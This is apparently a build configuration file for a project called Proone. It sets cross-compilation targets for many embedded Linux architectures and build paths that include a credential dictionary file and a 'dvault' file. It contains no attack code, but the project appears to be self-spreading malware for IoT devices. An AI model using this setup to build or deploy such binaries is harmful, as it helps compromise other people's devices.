# Target configurations
# Array of tuple strings, values separated by white spaces, in the following
# format.
#
# Format: <OS_NAME> <ARCH_NAME> <XCOMP_TYPE_ARG> <XCOMP_ARCH_ARG> <TOOLCHAIN_PREFIX>
#	OS_NAME: OS names in the names of the executables. Corresponds to `prne_os_t`
#	ARCH_NAME: CPU arch names in the names of the executables. Corresponds to `prne_arch_t`
#	XCOMP_TYPE_ARG: the first argument to the xcomp command "type"
#	XCOMP_ARCH_ARG: the second argument to the xcomp command "arch"
#	TOOLCHAIN_PREFIX: the build tool prefix
BUILD_TARGETS=(
#	"linux	aarch64	linux-app	aarch64	aarch64-linux"
	"linux	armv4t	linux-app	armv4t	arm-linux"
#	"linux	armv7	linux-app	armv7	arm-linux"
	"linux	i686	linux-app	i686	i686-linux"
#	"linux	x86_64	linux-app	x86_64	x86_64-linux"
	"linux	m68k	linux-app	m68k	m68k-linux"
	"linux	mips	linux-app	mips	mips-linux"
	"linux	mpsl	linux-app	mpsl	mipsel-linux"
	"linux	ppc		linux-app	ppc		powerpc-linux"
	"linux	sh4		linux-app	sh4		sh4-linux"
)

# The root prefix. Note that the script is run from the project root directory.
#PROONE_PREFIX="builds"
# The prefix to debug symbol files
#PROONE_DEBUG_SYM_DIR="$PROONE_PREFIX/debug"
# The prefix to Proone executables
#PROONE_EXEC_DIR="$PROONE_PREFIX/proone.bin"
# The prefix to native tools
#PROONE_TOOLS_DIR="$PROONE_PREFIX/tools"
# The prefix to miscellaneous executables for target
#PROONE_MISC_BIN_DIR="$PROONE_PREFIX/misc"
# The name of the directory for release build Proone executables
#PROONE_REL_DIR="$PROONE_PREFIX/proone"
# The prefix to debug symbol files
#export PROONE_DEBUG_SYM_PREFIX="$PROONE_DEBUG_SYM_DIR/"
# The prefix to all stripped executables
#export PROONE_EXEC_PREFIX="$PROONE_EXEC_DIR/stripped"
# The prefix to the original Proone executable output by the compiler
#export PROONE_ENTIRE_PREFIX="$PROONE_EXEC_DIR/entire"
# The prefix to the disassembler output
#export PROONE_ASM_PREFIX="$PROONE_EXEC_DIR/asm"
# The prefix to the readelf output
#export PROONE_READELF_PREFIX="$PROONE_EXEC_DIR/readelf"
# The prefix to the miscellaneous executables
#export PROONE_MISC_BIN_PREFIX="$PROONE_MISC_BIN_DIR/"
# The prefix to the names of the release build Proon executables
#PROONE_REL_PREFIX="$PROONE_REL_DIR/proone"
# The path to the cred dict binary file
#PROONE_CDICT="$PROONE_PREFIX/cred_dict.bin"
# The path to the dvault binary file
#PROONE_DVAULT="$PROONE_PREFIX/dvault.bin"
